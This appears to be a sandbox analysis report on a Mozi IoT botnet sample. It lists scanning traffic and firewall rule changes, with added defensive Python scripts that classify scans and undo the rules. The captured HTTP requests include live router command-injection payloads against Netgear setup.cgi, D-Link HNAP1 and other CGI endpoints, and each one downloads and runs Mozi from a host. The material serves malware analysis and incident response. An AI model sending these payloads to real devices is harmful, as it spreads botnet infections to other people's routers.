Source: global traffic TCP traffic: 192.168.2.20:15042 -> 120.0.30.153:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 178.137.1.177:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 69.68.118.29:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 92.154.174.188:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 184.171.204.218:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 59.250.162.213:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 182.82.125.53:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.36.221.166:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 80.18.245.185:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 200.141.44.86:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 97.229.39.239:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 102.53.0.243:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 27.3.146.85:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 36.170.191.82:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.78.202.173:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 201.198.23.60:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 179.131.194.114:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 86.67.177.59:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 13.100.254.46:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 158.118.208.135:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 130.221.150.32:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 177.168.241.5:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 12.59.131.86:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 67.52.33.137:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.64.40.28:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 104.126.166.232:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 57.181.135.64:2323
Source: global traffic TCP traffic: 192.168.2.20:45494 -> 82.194.132.178:49152
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 153.71.86.60:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 89.62.41.91:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 166.24.116.26:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 91.80.195.73:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 158.233.4.149:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 66.162.164.85:2323
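Two connection patterns are visible in the rows above: a single source port (15042) reused against hundreds of different hosts on 2323 and 1023, and ordinary ephemeral source ports used once each against 8080, 81, 8443, 5555, 7574, 52869, 37215 and 49152. The first is the footprint of a raw-socket SYN scanner (in the leaked Mirai source the scanner picks one source port at start-up and uses it to recognise its own SYN/ACKs), the second is one-shot exploit or login attempts from the kernel's normal socket path. The following Python script is an added example, not part of the Joe Sandbox report: it parses rows in the report's format and separates the two patterns. The rows it embeds are a constructed subset of the ones listed above, and the threshold of five distinct targets per source port is an assumption.

```python
"""Separate horizontal SYN scanning from one-shot connections in sandbox
'global traffic' rows.  Added example; the rows below are a constructed
subset of the report's output."""
import re
from collections import defaultdict

ROW = re.compile(
    r"TCP traffic: (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)

# Constructed sample: a handful of the rows printed in the report.
SAMPLE_ROWS = """\
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.25.8.99:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 210.225.37.119:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 153.43.5.52:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 20.10.172.16:2323
Source: global traffic TCP traffic: 192.168.2.20:45980 -> 206.215.160.208:8443
Source: global traffic TCP traffic: 192.168.2.20:60230 -> 194.134.230.15:8080
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 146.221.115.228:1023
Source: global traffic TCP traffic: 192.168.2.20:36064 -> 47.145.217.113:5555
Source: global traffic TCP traffic: 192.168.2.20:39274 -> 149.212.141.67:52869
Source: global traffic TCP traffic: 192.168.2.20:47312 -> 204.170.101.0:37215
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 186.129.59.209:2323
"""


def parse_rows(text):
    """Yield (src, sport, dst, dport) for every traffic row in the text."""
    for line in text.splitlines():
        m = ROW.search(line)
        if m:
            yield m["src"], int(m["sport"]), m["dst"], int(m["dport"])


def scan_summary(rows):
    """Group connections by source port.  A source port reused against many
    distinct destinations is a raw-socket scanner that chose the port once;
    the kernel hands out a fresh ephemeral port per connect() otherwise."""
    by_sport = defaultdict(lambda: {"dsts": set(), "dports": set()})
    for _src, sport, dst, dport in rows:
        by_sport[sport]["dsts"].add(dst)
        by_sport[sport]["dports"].add(dport)
    return by_sport


def classify(by_sport, min_targets=5):
    """Return (scanner_ports, oneshot_ports): destination ports reached from a
    source port that hit >= min_targets distinct hosts, and destination ports
    reached from source ports used only a few times.  min_targets is an
    assumed threshold, not something the report states."""
    scanner, oneshot = set(), set()
    for info in by_sport.values():
        if len(info["dsts"]) >= min_targets:
            scanner |= info["dports"]
        else:
            oneshot |= info["dports"]
    return scanner, oneshot


if __name__ == "__main__":
    by_sport = scan_summary(parse_rows(SAMPLE_ROWS))
    scanner, oneshot = classify(by_sport)
    print("SYN-scan target ports:", sorted(scanner))
    print("one-shot target ports:", sorted(oneshot))
```

The same grouping key, (source address, source port) with a distinct-destination count, works as a SIEM or NetFlow query; the (source port, destination port) pair is a far more specific indicator than destination port alone, since a fixed source port hitting 2323 across many /8s is not something a legitimate client does.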
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4672) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4679) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4720) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4732) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4755) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4763) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4785) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4815) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4819) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4838) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4866) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4896) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4915) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4939) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4986) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4992) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5015) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5063) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5071) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5095) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5119) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5139) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5158) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5167) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5194) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5215) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5229) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5253) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT Jump to behavior
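The rules above open 44040/tcp and 8080/udp in both directions (filter and nat tables) and drop inbound and outbound traffic on 58000, 35000, 50023 and 7547 (7547/tcp is the TR-069/CWMP management port). Every rule is issued twice, once with the long option spelling (--destination-port, --source-port) and once with the short one (--dport, --sport); the report does not say why, and the likely reason, offered here as an assumption, is to cover iptables builds that reject one spelling. The practical consequence for a responder is that each rule exists twice in the chain and `iptables -D` removes only one matching instance per call. The following Python script is an added example, not part of the sandbox report: it normalises such commands, summarises what they open and block, and emits the inverse `-D` commands. The command list it embeds is a constructed subset of the rows above.

```python
"""Normalise the iptables commands a sample issued and derive the inverse
'-D' rules that undo them.  Added example; the command list is a constructed
subset of the rows in the sandbox report."""
import shlex

SAMPLE_CMDS = [
    "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT",
    "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT",
    "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT",
    "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT",   # same match, short spelling
    "iptables -I INPUT -p tcp --destination-port 7547 -j DROP",
    "iptables -I INPUT -p tcp --dport 7547 -j DROP",
    "iptables -I OUTPUT -p tcp --sport 7547 -j DROP",
    "iptables -I INPUT -p udp --dport 8080 -j ACCEPT",
]

# Long and short spellings select the same match; the sample issues both.
ALIASES = {"--destination-port": "--dport", "--source-port": "--sport"}


def parse_rule(cmd):
    """Describe one 'iptables -I ...' command as a dict, with option spellings
    normalised so duplicate rules compare equal.  Only the options seen in
    the report are handled; anything else is an error rather than a guess."""
    argv = shlex.split(cmd)
    rule = {"table": "filter", "chain": None, "proto": None,
            "match": None, "port": None, "target": None}
    i = 1
    while i < len(argv):
        opt = ALIASES.get(argv[i], argv[i])
        if opt == "-I":
            rule["chain"] = argv[i + 1]
        elif opt == "-t":
            rule["table"] = argv[i + 1]
        elif opt == "-p":
            rule["proto"] = argv[i + 1]
        elif opt in ("--dport", "--sport"):
            rule["match"] = opt
            rule["port"] = int(argv[i + 1])
        elif opt == "-j":
            rule["target"] = argv[i + 1]
        else:
            raise ValueError(f"unhandled token {argv[i]!r} in {cmd!r}")
        i += 2
    return rule


def rule_summary(cmds):
    """Return (opened, blocked): sets of (proto, port) the rules ACCEPT or DROP."""
    opened, blocked = set(), set()
    for r in map(parse_rule, cmds):
        (opened if r["target"] == "ACCEPT" else blocked).add((r["proto"], r["port"]))
    return opened, blocked


def undo_commands(cmds):
    """One 'iptables -D' per inserted rule instance.  Because the sample
    inserted each match twice, the identical -D appears twice too: -D deletes
    only the first matching rule per invocation."""
    out = []
    for r in map(parse_rule, cmds):
        table = "" if r["table"] == "filter" else f" -t {r['table']}"
        out.append(f"iptables{table} -D {r['chain']} -p {r['proto']} "
                   f"{r['match']} {r['port']} -j {r['target']}")
    return out


if __name__ == "__main__":
    opened, blocked = rule_summary(SAMPLE_CMDS)
    print("opened:", sorted(opened))
    print("blocked:", sorted(blocked))
    for cmd in undo_commands(SAMPLE_CMDS):
        print(cmd)
```

On a live device, compare the output of `iptables -S` (and `iptables -t nat -S`) against the generated list before deleting anything, and expect the bot to re-insert the rules if it is still running; the firewall cleanup is only meaningful after the process has been killed and the persistence entries under /etc/profile and the System V runlevel scripts noted above have been removed.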
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
Host: 81.196.113.75:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
Host: 184.86.117.97:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
Host: 210.190.146.92:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 49.44.132.19:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
